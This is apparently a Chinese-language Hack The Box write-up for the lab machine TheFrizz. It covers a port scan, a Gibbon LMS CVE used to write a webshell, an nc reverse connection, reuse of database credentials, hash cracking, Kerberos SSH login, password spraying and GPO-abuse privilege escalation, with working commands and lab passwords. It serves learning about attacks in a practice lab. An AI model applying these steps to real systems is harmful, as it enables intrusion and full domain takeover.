HTB打靶记录-TheFrizz
信息收集
nmap -sV -sC -O 10.10.11.60
Nmap scan report for 10.10.11.60
Host is up (0.63s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_9.5 (protocol 2.0)
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
|_http-title: Did not follow redirect to http://frizzdc.frizz.htb/home/
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-04-06 16:58:47Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|2012|2016 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (89%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Hosts: localhost, FRIZZDC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 6h40m55s
| smb2-time:
| date: 2025-04-06T16:59:55
|_ start_date: N/A
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 170.30 seconds
CVE-2023-45878
有个web服务,搜一下有cve,可以读sql文件
http://frizzdc.frizz.htb/Gibbon-LMS//?q=./gibbon.sql
没用,继续搜,CVE-2023-45878,写webshell
蚁剑连接,传个nc.exe上去反连
net user /domain
a.perlstein
Administrator
c.ramon
c.sandiego
d.hudson
f.frizzle
g.frizzle
Guest
h.arm
J.perlstein
k.franklin
krbtgt
l.awesome
m.ramon
M.SchoolBus
p.terese
r.tennelli
t.wright
v.frizzle
w.li
w.Webservice
mysql
查看config.php内容,拿到mysql账号密码
$databaseServer = 'localhost';
$databaseUsername = 'MrGibbonsDB';
$databasePassword = 'MisterGibbs!Parrot!?1';
$databaseName = 'gibbon';
使用frp把3306端口代理出来,用navicat连接,查看gibbonperson表,拿到密码和盐值
067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03$/aACFhikmNopqrRTVz2489
john爆破
john --format=dynamic='sha256($s.$p)' --wordlist=/usr/share/wordlists/rockyou.txt 1.hash
拿到密码:***********
因为没开5985端口,所以不能通过winrm登录,这里通过获取f.frizzle票据通过ssh去登录
Kerberos认证
修改/etc/krb5.conf
[libdefaults]
default_realm = FRIZZ.HTB
# The following krb5.conf variables are only for MIT Kerberos.
kdc_timesync = 1
ccache_type = 4
forwardable = true
proxiable = true
rdns = false
# The following libdefaults parameters are only for Heimdal Kerberos.
fcc-mit-ticketflags = true
[realms]
FRIZZ.HTB = {
kdc = frizzdc.frizz.htb
admin_server = frizzdc.firzz.htb
default_domain = frizz.htb
}
[domain_realm]
.frizz.htb = FRIZZ.HTB
frizz.htb = FRIZZ.HTB
kinit f.frizzle@FRIZZ.HTB 去请求票据
klist 查看票据
ssh f.frizzle@frizz.htb -K 通过票据去登录,读取desktop/user.txt
bloodhound
一直超时,我cnm,只好传个SharpHound.exe上去收集,卡到怀疑人生,最后通过nc将压缩包传回kali
分析f.frizzle的域关系网,什么都没有。废物用户,回收站翻到一个压缩包
通过nc传输,等了半天,解压缩找密码
grep -IR "wapt_password",为什么这么找?因为文件名是这个,直接搜password太多了
拿到密码:!suBcig@MehTed!R
密码喷洒一下,kerbrute passwordspray -d frizz.htb --dc 10.10.11.60 user.txt '!suBcig@MehTed!R'
是M.SchoolBus的,ssh连上去
这环境shi一样,接下来说思路,bloodhound查看M.SchoolBus的关系网
M.SchoolBus属于GPCO组,说明M.SchoolBus可以打GPO Abuse,写一个恶意GPO进去来进行提权
// 创建恶意GOP
New-GPO -Name "hacker"
// 链接GPO到域控制器
New-GPLink -Name "hacker" -Target "OU=Domain Controllers,DC=frizz,DC=htb"
// 将M.SchoolBus加入域管理员组
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount M.SchoolBus --GPOName hacker
// 刷新GPO
gpupdate /force
结束
浙公网安备 33010602011771号